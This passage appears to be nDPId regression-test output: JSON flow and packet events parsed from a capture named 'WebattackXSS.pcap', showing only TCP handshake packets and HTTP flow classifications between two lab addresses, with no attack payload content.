-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9029,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1499348057789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348057789,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cW1AAD4GVGOsEAABwKgKMoq+AFBo3mEQAAAAAKACchD4TAAAAgQFtAQCCAoBPRB9AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9030,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":2,"flow_last_seen":1499348057790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348057790,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQir7ZkVGbaN5hEaAScSDoJwAAAgQFtAQCCAoD5uHwAT0QfQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":3,"flow_last_seen":1499348057790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348057790,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0cW5AAD4GVGqsEAABwKgKMoq+AFBo3mER2ZFRnIAQAOWHLwAAAQEICgE9EH0D5uHw"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9041,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348059068,"flow_last_seen":1499348059068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348059068,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9041,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1499348059068,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348059068,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SJlAAD4GfTesEAABwKgKMorMAFAzNVklAAAAAKACchA0lAAAAgQFtAQCCAoBPRG8AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9042,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":2,"flow_last_seen":1499348059069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348059069,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQisz9Lu2rMzVZJqAScSBjgQAAAgQFtAQCCAoD5uMwAT0RvAEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":3,"flow_last_seen":1499348059069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348059069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SJpAAD4GfT6sEAABwKgKMorMAFAzNVkm\/S7trIAQAOUCiAAAAQEICgE9Eb0D5uMw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9050,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348060393,"flow_last_seen":1499348060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060393,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9050,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1499348060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348060393,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80ItAAD4G9USsEAABwKgKMoraAFD\/pcOMAAAAAKACchD8YgAAAgQFtAQCCAoBPRMHAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9051,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":2,"flow_last_seen":1499348060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348060393,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQitr3giqS\/6XDjaAScSDyygAAAgQFtAQCCAoD5uR7AT0TBwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":3,"flow_last_seen":1499348060394,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348060394,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00IxAAD4G9UusEAABwKgKMoraAFD\/pcON94Iqk4AQAOWR0QAAAQEICgE9EwgD5uR7"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"finished","flow_packets_processed":316,"flow_first_seen":1499347872187,"flow_last_seen":1499347941610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347935445,"flow_last_seen":1499347940883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34238,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347935445,"flow_last_seen":1499347940883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347936727,"flow_last_seen":1499347941876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347936727,"flow_last_seen":1499347941876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347940593,"flow_last_seen":1499347945883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347940593,"flow_last_seen":1499347945883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347943146,"flow_last_seen":1499347948885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347943146,"flow_last_seen":1499347948885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347944440,"flow_last_seen":1499347949885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347944440,"flow_last_seen":1499347949885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348061684,"flow_last_seen":1499348061684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348061684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1499348061684,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348061684,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8R+ZAAD4GfeqsEAABwKgKMoroAFA+FlOsAAAAAKACchAsggAAAgQFtAQCCAoBPRRKAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":2,"flow_last_seen":1499348061684,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348061684,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiuhWb4DgPhZTraAScSBsbAAAAgQFtAQCCAoD5uW+AT0USgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9064,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":3,"flow_last_seen":1499348061685,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348061685,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0R+dAAD4GffGsEAABwKgKMoroAFA+FlOtVm+A4YAQAOULdAAAAQEICgE9FEoD5uW+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9083,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348064243,"flow_last_seen":1499348064243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348064243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9083,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1499348064243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348064243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Y\/tAAD4GYdWsEAABwKgKMosCAFBtqHUxAAAAAKACchDY0AAAAgQFtAQCCAoBPRbKAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9084,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":2,"flow_last_seen":1499348064243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348064243,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiwKN0\/hjbah1MqAScSBnUwAAAgQFtAQCCAoD5ug+AT0WygEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":3,"flow_last_seen":1499348064244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348064244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Y\/xAAD4GYdysEAABwKgKMosCAFBtqHUyjdP4ZIAQAOUGWwAAAQEICgE9FsoD5ug+"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348065546,"flow_last_seen":1499348065546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348065546,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1499348065546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348065546,"pkt":"ABm5CmnxAMGxFOsxCABFAAA882RAAD4G0musEAABwKgKMosQAFA77ut0AAAAAKACchCS8wAAAgQFtAQCCAoBPRgQAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":2,"flow_last_seen":1499348065547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348065547,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQixCTY4b2O+7rdaAScSCMDQAAAgQFtAQCCAoD5umEAT0YEAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":3,"flow_last_seen":1499348065547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348065547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA082VAAD4G0nKsEAABwKgKMosQAFA77ut1k2OG94AQAOUrFQAAAQEICgE9GBAD5umE"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348068136,"flow_last_seen":1499348068136,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348068136,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1499348068136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348068136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8f2xAAD4GRmSsEAABwKgKMosqAFAaVGX7AAAAAKACchA3ZgAAAgQFtAQCCAoBPRqXAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":2,"flow_last_seen":1499348068136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348068136,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiyoM4+ekGlRl\/KAScSBTywAAAgQFtAQCCAoD5uwLAT0alwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9118,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":3,"flow_last_seen":1499348068136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348068136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0f21AAD4GRmusEAABwKgKMosqAFAaVGX8DOPnpYAQAOXy0gAAAQEICgE9GpcD5uwL"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9125,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348069426,"flow_last_seen":1499348069426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348069426,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9125,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1499348069426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348069426,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86kVAAD4G24qsEAABwKgKMos4AFDyvfGfAAAAAKACchDSBgAAAgQFtAQCCAoBPRvaAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9126,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":2,"flow_last_seen":1499348069426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348069426,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiziWvrte8r3xoKAScSCPkwAAAgQFtAQCCAoD5u1OAT0b2gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":3,"flow_last_seen":1499348069427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348069427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06kZAAD4G25GsEAABwKgKMos4AFDyvfGglr67X4AQAOUumwAAAQEICgE9G9oD5u1O"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348070791,"flow_last_seen":1499348070791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070791,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1499348070791,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348070791,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jQtAAD4GOMWsEAABwKgKMotGAFAklpAkAAAAAKACchAARwAAAgQFtAQCCAoBPR0vAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":2,"flow_last_seen":1499348070791,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348070791,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi0aOH7cfJJaQJaAScSDJXAAAAgQFtAQCCAoD5u6jAT0dLwEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":3,"flow_last_seen":1499348070792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348070792,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jQxAAD4GOMysEAABwKgKMotGAFAklpAljh+3IIAQAOVoZAAAAQEICgE9HS8D5u6j"} 